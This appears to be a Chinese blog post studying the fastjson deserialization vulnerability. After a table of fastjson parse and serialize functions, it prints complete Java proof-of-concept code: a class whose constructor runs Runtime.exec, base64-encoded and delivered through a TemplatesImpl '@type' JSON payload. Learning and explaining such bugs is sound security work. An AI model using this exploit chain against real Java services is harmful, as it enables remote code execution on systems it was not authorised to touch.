这个漏洞一直只了解个大概,最近有空深入研究一下
JAVA环境
java version "1.8.0_211" Java(TM) SE Runtime Environment (build 1.8.0_211-b12) Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)建立一个USER类
public class User { private int age; public String username; private String secret; public int getAge() { return age; } public void setAge(int age) { this.age = age; } public String getUsername() { return username; } public void setUsername(String username) { this.username = username; } public String getSecret() { return secret; } @Override public String toString() { return this.age + "," + this.username + "," + this.secret; } }
函数 |
作用 |
---|---|
JSON.toJSONString(Object) |
将对象序列化成json 格式
|
JSON.toJSONString(Object,SerializerFeature.WriteClassName) |
将对象序列化成json 格式,并且记录了对象所属的类的信息
|
JSON.parse(Json) |
将json 格式返回为对象(但是反序列化类对象没有@Type时会报错)
|
JSON.parseObject(Json) |
返回对象是com.alibaba.fastjson.JSONObject 类
|
JSON.parseObject(Json, Object.class) |
返回对象会根据json 中的@Type来决定
|
JSON.parseObject(Json, User.class, Feature.SupportNonPublicField); |
会把Json数据对应的类中的私有成员也给还原 |
直接用网上的利用POC
import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import java.io.IOException; public class poc extends AbstractTranslet { public poc() throws IOException { Runtime.getRuntime().exec("calc.exe"); } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { } @Override public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException { } public static void main(String[] args) throws Exception { poc t = new poc(); } }
编译这个文件,将其内容进行base64编码,用fastjson把对象还原
import java.io.*; import java.util.HashMap; import java.util.Map; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; import com.alibaba.fastjson.parser.ParserConfig; import org.apache.commons.io.IOUtils; import org.apache.commons.codec.binary.Base64; public class Vultest { public static String readClass(String cls){ ByteArrayOutputStream bos = new ByteArrayOutputStream(); try { IOUtils.copy(new FileInputStream(new File(cls)), bos); } catch (IOException e) { e.printStackTrace(); } return Base64.encodeBase64String(bos.toByteArray()); } public static void main(String[] args) throws UnsupportedEncodingException { ParserConfig config = new ParserConfig(); String evilCode = readClass("D://code//fastjsonvul//target//classes//Poc.class"); final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; String text1 = "{\"@type\":\"" + NASTY_CLASS +"\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }," + "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"; Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); } }在excec下断点查看调用
上一篇
jwt原理
jwt原理
下一篇
内网渗透SPN信息收集
内网渗透SPN信息收集
版权声明:《 fastjson反序列化漏洞原理 》为admin原创文章,转载请注明出处!
最后编辑:2020-7-13 08:07:00